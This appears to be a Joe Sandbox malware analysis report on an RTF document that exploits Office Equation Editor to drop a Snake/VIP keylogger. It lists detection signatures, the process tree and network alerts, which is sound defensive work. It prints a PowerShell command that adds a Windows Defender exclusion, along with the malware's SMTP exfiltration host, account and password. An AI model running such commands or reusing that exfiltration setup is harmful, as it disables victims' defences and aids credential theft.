Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
na.doc

Overview

General Information

Sample name:na.doc
Analysis ID:1545183
MD5:991c3ef3605df4ffc60c31c48747fec9
SHA1:723ebd382ae7f1d0a12aa4dc8f63885814ec7bbf
SHA256:71c7ce3ae15af93c31891bfb40543074c2ea5a51f34ff3c13e52c68d1e020053
Tags:docuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3532 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3616 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • cdlpohalgate39567.exe (PID: 3788 cmdline: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe" MD5: F395BAA43F62DF879CA3F4810ECDCFB8)
        • powershell.exe (PID: 3864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • cdlpohalgate39567.exe (PID: 3872 cmdline: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe" MD5: F395BAA43F62DF879CA3F4810ECDCFB8)
    • EQNEDT32.EXE (PID: 3132 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logs@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logs@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
na.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xfbee7:$obj2: \objdata
  • 0xfbf01:$obj3: \objupdate
  • 0xfbec3:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.942222984.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.cdlpohalgate39567.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            7.2.cdlpohalgate39567.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              7.2.cdlpohalgate39567.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                7.2.cdlpohalgate39567.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.cdlpohalgate39567.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2dca0:$a1: get_encryptedPassword
                  • 0x2e228:$a2: get_encryptedUsername
                  • 0x2d913:$a3: get_timePasswordChanged
                  • 0x2da2a:$a4: get_passwordField
                  • 0x2dcb6:$a5: set_encryptedPassword
                  • 0x309d2:$a6: get_passwords
                  • 0x30d66:$a7: get_logins
                  • 0x309be:$a8: GetOutlookPasswords
                  • 0x30377:$a9: StartKeylogger
                  • 0x30cbf:$a10: KeyLoggerEventArgs
                  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 27 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 87.120.84.38, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exe

                  System Summary

                  barindex
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49164, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3616, Protocol: tcp, SourceIp: 87.120.84.38, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, ParentProcessId: 3788, ParentProcessName: cdlpohalgate39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ProcessId: 3864, ProcessName: powershell.exe
                  Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                  Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, NewProcessName: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ProcessId: 3788, ProcessName: cdlpohalgate39567.exe
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, NewProcessName: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, OriginalFileName: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3616, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ProcessId: 3788, ProcessName: cdlpohalgate39567.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, ParentProcessId: 3788, ParentProcessName: cdlpohalgate39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ProcessId: 3864, ProcessName: powershell.exe
                  Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                  Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, QueryName: checkip.dyndns.org
                  Sigma detected: Modification of IE Registry Settings
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3616, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ParentImage: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe, ParentProcessId: 3788, ParentProcessName: cdlpohalgate39567.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe", ProcessId: 3864, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3532, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3864, TargetFilename: C:\Users\user\AppData\Local\Temp\gzb5uyex.xhe.ps1

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:32:00.624202+010020220501A Network Trojan was detected87.120.84.3880192.168.2.2249164TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:32:00.968097+010020220511A Network Trojan was detected87.120.84.3880192.168.2.2249164TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:32:12.249570+010028033053Unknown Traffic192.168.2.2249167188.114.97.3443TCP
                  2024-10-30T08:32:18.778451+010028033053Unknown Traffic192.168.2.2249173188.114.96.3443TCP
                  2024-10-30T08:32:20.514930+010028033053Unknown Traffic192.168.2.2249175188.114.97.3443TCP
                  2024-10-30T08:32:24.879520+010028033053Unknown Traffic192.168.2.2249179188.114.97.3443TCP
                  2024-10-30T08:32:28.926211+010028033053Unknown Traffic192.168.2.2249181188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:32:10.430131+010028032742Potentially Bad Traffic192.168.2.2249165132.226.8.16980TCP
                  2024-10-30T08:32:11.662175+010028032742Potentially Bad Traffic192.168.2.2249165132.226.8.16980TCP
                  2024-10-30T08:32:14.061495+010028032742Potentially Bad Traffic192.168.2.2249168132.226.247.7380TCP
                  2024-10-30T08:32:16.278047+010028032742Potentially Bad Traffic192.168.2.2249170132.226.8.16980TCP
                  2024-10-30T08:32:18.179924+010028032742Potentially Bad Traffic192.168.2.2249172158.101.44.24280TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: na.docAvira: detected
                  Found malware configuration
                  Source: 00000007.00000002.942629985.00000000024E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}
                  Source: 7.2.cdlpohalgate39567.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exeReversingLabs: Detection: 70%
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeReversingLabs: Detection: 70%
                  Multi AV Scanner detection for submitted file
                  Source: na.docReversingLabs: Detection: 50%
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org

                  Exploits

                  barindex
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.120.84.38 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49182 version: TLS 1.2
                  Source: Binary string: DGaD.pdb source: cdlpohalgate39567.exe, 00000005.00000000.428364525.0000000001012000.00000020.00000001.01000000.00000004.sdmp, cdlpohalgate39567.exe.2.dr, pgTQ4mfZBbJhpdd[1].exe.2.dr
                  Source: Binary string: DGaD.pdbSHA256 source: cdlpohalgate39567.exe, 00000005.00000000.428364525.0000000001012000.00000020.00000001.01000000.00000004.sdmp, cdlpohalgate39567.exe.2.dr, pgTQ4mfZBbJhpdd[1].exe.2.dr

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_002569B8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00259743h7_2_00259330
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0025767Dh7_2_00257490
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00259181h7_2_00258EC2
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0025EB89h7_2_0025E8A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0025F4B9h7_2_0025F1D9
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00258007h7_2_00257B35
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0025FDE9h7_2_0025FB08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0025F021h7_2_0025ED40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0025F951h7_2_0025F670
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00259743h7_2_00259672
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006485AAh7_2_006482B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00643A09h7_2_00643760
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064A25Ah7_2_00649F60
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00642339h7_2_00642068
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064CD62h7_2_0064CA68
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00640C41h7_2_00640970
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00647A41h7_2_00647770
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064F86Ah7_2_0064F570
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00646349h7_2_00646078
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00648A72h7_2_00648778
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00640311h7_2_00640040
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00647111h7_2_00646E40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00648F3Ah7_2_00648C40
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00645A19h7_2_00645748
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064BA42h7_2_0064B748
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00644321h7_2_00644050
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064E54Ah7_2_0064E250
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064A722h7_2_0064A428
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00643101h7_2_00642E30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064D22Ah7_2_0064CF30
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00641A09h7_2_00641738
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064FD32h7_2_0064FA38
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006427D1h7_2_00642500
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006410D9h7_2_00640E08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00647F7Ah7_2_00647C08
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00649402h7_2_00649108
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006467E2h7_2_00646510
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064BF0Ah7_2_0064BC10
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006450E9h7_2_00644E18
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064EA12h7_2_0064E718
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00645EB1h7_2_00645BE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064EEDAh7_2_0064EBE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006447B9h7_2_006444E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064ABEAh7_2_0064A8F0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064D6F2h7_2_0064D3F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064DBBAh7_2_0064D8C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00643599h7_2_006432C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00641EA1h7_2_00641BD0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006498CAh7_2_006495D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006407A9h7_2_006404D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 006475A9h7_2_006472D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064C3D2h7_2_0064C0D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00641571h7_2_006412A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064C89Ah7_2_0064C5A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00646C79h7_2_006469A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 0064F3A2h7_2_0064F0A8
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00645581h7_2_006452B0
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 4x nop then jmp 00643E89h7_2_00643BB8
